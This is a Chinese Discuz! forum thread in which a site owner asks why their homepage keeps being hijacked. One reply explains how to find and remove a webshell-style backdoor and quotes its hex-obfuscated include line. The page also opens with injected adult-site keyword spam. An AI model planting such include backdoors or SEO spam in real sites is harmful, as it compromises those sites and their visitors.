97久久国产亚洲精品超碰热,成人又色又爽的免费网站,色偷偷女人的天堂a,男女高潮喷水在线观看,国内精品一线二线三线区别在哪里

Discuz! 官方交流社區(qū)

標(biāo)題: 首頁總是被篡改，有時(shí)候一天都會出現(xiàn)2-3次 [打印本頁]

作者: zhucedis 時(shí)間: 2020-8-5 14:06
標(biāo)題: 首頁總是被篡改，有時(shí)候一天都會出現(xiàn)2-3次
本帖最后由 zhucedis 于 2020-8-8 12:08 編輯

求大神指點(diǎn)下這到底是怎么回事，如何解決！謝謝
(, 下載次數(shù): 14)

感謝大神：allthebest 的指點(diǎn) 非常感謝

作者: 好佳芯科技 時(shí)間: 2020-8-5 14:11
是不是安裝盜版的插件了，你dz有病毒了，可以考慮一下安裝安全插件：https://addon.dismall.com/plugins/nayuan_safe.html，需要清理病毒的話，可以加我QQ276440802

作者: crx349 時(shí)間: 2020-8-7 10:00
一般是被掛馬了盡快清理作好服務(wù)器安全哦

作者: allthebest 時(shí)間: 2020-8-8 03:38
若存在，處理前，先卸載所有盜版插件與模版。

進(jìn)discuz后臺找到工具-文件校驗(yàn)，看下最近有哪些php文件被修改了。

1、排查網(wǎng)站源文件的php 文件，查看是否有出現(xiàn)IP地址、或者異常網(wǎng)站（上面跳轉(zhuǎn)的網(wǎng)站），如果有刪除就可以了。

2、排查網(wǎng)站源文件的php 文件，查看是否有如下代碼：@include($_SERVER['DOCUMENT_ROOT']

（排查一般用WEBshell后門掃描軟件掃描核查?。?br />
如果有就刪除此段代碼。并把該段代碼進(jìn)行解密。

舉例：@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代碼為：2F646174612F6176617461722F30

解密后為：/data/avatar/0

代碼解密地址：http://www.bejson.com/convert/ox2str/

意思就是在上述路徑下存在被非法上傳的文件，用于做快照劫持。

解決辦法：刪除上面的代碼和文件即可。

掛馬問題解決了后，記得更改服務(wù)器相關(guān)的各種密碼，盡量設(shè)置的復(fù)雜一點(diǎn)。

歡迎光臨 Discuz! 官方交流社區(qū) (http://r615.cn/)